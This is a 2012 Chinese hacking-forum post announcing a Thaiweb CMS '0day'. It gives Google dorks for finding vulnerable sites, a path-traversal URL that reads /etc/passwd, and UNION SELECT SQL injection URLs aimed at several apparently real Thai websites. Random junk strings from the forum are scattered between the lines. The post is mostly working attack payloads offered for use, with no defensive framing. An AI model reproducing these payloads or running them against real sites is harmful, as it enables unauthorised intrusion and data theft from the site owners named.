中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
- o' {* M1 K' v" l; _
' P* i9 g# i; C9 S( c! e5 p
intext:powered by Thaiweb
5 \* e! a2 [0 @' f% F" O; Z
3 S$ U, Y7 V. k6 w- N' _. F- _
inurl:index.php?page=board.php
8 [" Y( G* g# o& P3 s3 k* A4 _5 q$ q
" C, D& z L3 g) U6 v
! X( L ?2 ?: b. v5 C/ p- h5 Y; ^+ a
% m0 t$ @- X: F; F* V6 A
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
- h" c2 H' {. E; ?0 p$ b
9 w# D3 O' j- Z% ?: m! y* O
3 ^% h2 A% f* z* N9 ]
; w& I* D2 Z/ A, J' w; j( f* b
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
3 \' K' [9 L; C) {) g) T, W t" o
/ d8 W/ `) ^- X% ?: @% r* @/ x9 ~+ W
- z. |) [0 I/ k3 H$ X
$ }3 x/ O3 f$ O3 O9 h. m
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) p7 K" b; Y, P; k
. y8 D; b# s& `0 [5 \$ Y7 r' t4 L$ f
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
. v" ?$ a& X+ Z" @
/ y, [6 {7 c# e$ n' A
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
& U9 D$ q) c: R6 }9 c' e) S) k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2